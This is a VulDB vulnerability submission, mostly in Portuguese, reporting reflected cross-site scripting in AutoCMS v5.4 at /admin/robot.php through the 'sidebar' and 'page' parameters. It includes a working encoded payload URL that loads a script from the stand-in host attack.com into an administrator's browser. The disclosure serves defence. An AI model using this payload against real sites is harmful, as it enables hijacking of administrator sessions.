| Título | AutoCMS v5.4 Cross Site Scripting |
|---|
| Descrição | Summary
AutoCMS v5.4 was discovered to contain a XSS vulnerability via the sidebar parameter at /admin/robot.php.
Affected Component: /admin/robot.php
Description: The application fails to sufficiently sanitize and escape input parameters page and sidebar. An attacker can craft a malicious URL that, when accessed by an administrator, will execute arbitrary JavaScript code.
Payload:
http(s)://target-ip/admin/robot.php?page=1&sidebar=1%22%3E%3CsCRiPt/SrC=//attack.com/1.js%3E
|
|---|
| Fonte | ⚠️ https://github.com/Hebing123/cve/issues/68 |
|---|
| Utilizador | jiashenghe (UID 39445) |
|---|
| Submissão | 13/09/2024 05h22 (há 2 anos) |
|---|
| Moderação | 14/09/2024 08h43 (1 day later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 277503 [AutoCMS 5.4 /admin/robot.php sidebar Script de Site Cruzado] |
|---|
| Pontos | 20 |
|---|